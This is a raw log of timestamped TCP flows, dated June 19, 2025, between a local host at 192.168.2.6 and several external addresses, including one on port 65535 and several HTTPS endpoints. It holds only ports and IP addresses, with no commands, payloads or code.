Jun 19, 2025 12:58:51.215065956 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215073109 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215075970 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.215097904 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215100050 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.215105057 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215121984 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215123892 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.215152979 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.215436935 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215445042 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215579987 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.215734959 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215742111 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215748072 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215753078 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215760946 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215774059 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215780973 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215787888 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215792894 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.215795040 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215812922 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215816021 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.215857029 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215859890 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.215862989 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215876102 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215882063 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215888977 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215907097 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.215914011 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.215964079 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.216401100 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216408014 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216413975 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216509104 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216515064 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216521025 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216526031 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216532946 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216535091 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.216540098 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216546059 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216552019 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.216552973 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216567993 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216574907 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216578960 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.216617107 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.216617107 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.216701031 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216707945 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216718912 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216732025 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216738939 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216749907 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216756105 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.216763973 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.216792107 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.264565945 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.358302116 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:51.556274891 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.556845903 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:51.557111025 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:54.688926935 CEST	49697	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:54.688972950 CEST	443	49697	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:54.689040899 CEST	49697	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:54.689337969 CEST	49697	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:54.689343929 CEST	443	49697	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:54.791717052 CEST	49697	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:54.793225050 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:54.793232918 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:54.793294907 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:54.799412012 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:54.799422979 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:54.836271048 CEST	443	49697	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:54.904792070 CEST	443	49697	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:54.904859066 CEST	49697	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.015813112 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.015944004 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.018580914 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.018593073 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.019015074 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.019015074 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.019025087 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.019032955 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.028731108 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.030136108 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.030272961 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.030411005 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.030411005 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.031013012 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.031126976 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.060403109 CEST	49701	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.060446024 CEST	443	49701	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.060606003 CEST	49701	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.061592102 CEST	49701	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.061602116 CEST	443	49701	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.071736097 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.152741909 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.153129101 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.153258085 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.154887915 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.156188965 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.156316042 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.168585062 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.174686909 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.174725056 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.174760103 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.175241947 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.176928043 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.224272966 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.241329908 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.241343975 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.241550922 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.254723072 CEST	443	49701	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.256170988 CEST	49701	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.256170988 CEST	49701	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.256195068 CEST	443	49701	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.256207943 CEST	443	49701	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.256709099 CEST	443	49701	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.256742001 CEST	49701	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.257307053 CEST	443	49701	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.257538080 CEST	443	49701	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.257577896 CEST	49701	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.258362055 CEST	49701	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.260917902 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.261138916 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.272876024 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.272912979 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.273870945 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.273870945 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.273905039 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.290749073 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.290939093 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.303553104 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.303900957 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.304265022 CEST	443	49701	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.332804918 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.333002090 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.348659992 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.348839998 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.363327980 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.363706112 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.371932030 CEST	443	49701	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.372168064 CEST	443	49701	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.372286081 CEST	49701	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.374177933 CEST	443	49701	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.377873898 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.377965927 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.378021955 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.381341934 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.381448984 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.382002115 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.382205009 CEST	443	49700	142.250.80.100	192.168.2.6
Jun 19, 2025 12:58:55.382339954 CEST	49700	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.415898085 CEST	49701	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:58:55.470000029 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.470015049 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.470130920 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.505645037 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.505675077 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.506136894 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.506136894 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.506143093 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.506151915 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.506603956 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.507323980 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.508291006 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.508476019 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.511449099 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.556269884 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.600366116 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.624583006 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.624599934 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.624720097 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.691442013 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.691566944 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.721015930 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.721158981 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.742655993 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.742783070 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.769932032 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.770251036 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.785821915 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.786036968 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.805505037 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.807018042 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.826272964 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.826611042 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.843606949 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.843759060 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.850255013 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.850394011 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.862226963 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.862471104 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.872325897 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.872526884 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.880028009 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.880117893 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.888355017 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.888726950 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.896045923 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.896199942 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.903201103 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.903574944 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.914021015 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.914175987 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.919101000 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.919308901 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.925657988 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.926328897 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.931854010 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.932085991 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.943820953 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.946408033 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.948671103 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.948805094 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.954857111 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.954946995 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.960135937 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.960230112 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.965138912 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.965243101 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.970195055 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.970271111 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.974342108 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.974433899 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.978617907 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.978709936 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.983513117 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.983594894 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.988807917 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.988895893 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.992537975 CEST	49678	443	192.168.2.6	20.42.65.91
Jun 19, 2025 12:58:55.993534088 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.993628979 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.997040033 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.997111082 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:55.999109030 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:55.999203920 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.002731085 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.002816916 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.006407976 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.006495953 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.009836912 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.009929895 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.012793064 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.012873888 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.016144037 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.016218901 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.018834114 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.018924952 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.022896051 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.022985935 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.024939060 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.025031090 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.029817104 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.029911041 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.032632113 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.032699108 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.035166025 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.035248995 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.038985968 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.039062023 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.041696072 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.041779041 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.044473886 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.044555902 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.047723055 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.047806025 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.050453901 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.050537109 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.053585052 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.053685904 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.057195902 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.057274103 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.059302092 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.059360027 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.061877012 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.061960936 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.063107014 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.063194990 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.064491987 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.064567089 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.066412926 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.066483021 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.069236994 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.069330931 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.071037054 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.071120977 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.073574066 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.073659897 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.076448917 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.076525927 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.082109928 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.082185984 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.082350969 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.082427025 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.084108114 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.084188938 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.085711002 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.086133003 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.089680910 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.089775085 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.089776993 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.089842081 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.094178915 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.094257116 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.094266891 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.094338894 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.097914934 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.097995996 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.098018885 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.098088980 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.101701975 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.101783991 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.101816893 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.101897001 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.103935957 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.104020119 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.104034901 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.104109049 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.107970953 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.108061075 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.108068943 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.108134031 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.110907078 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.110991955 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.111007929 CEST	49702	443	192.168.2.6	142.251.40.225
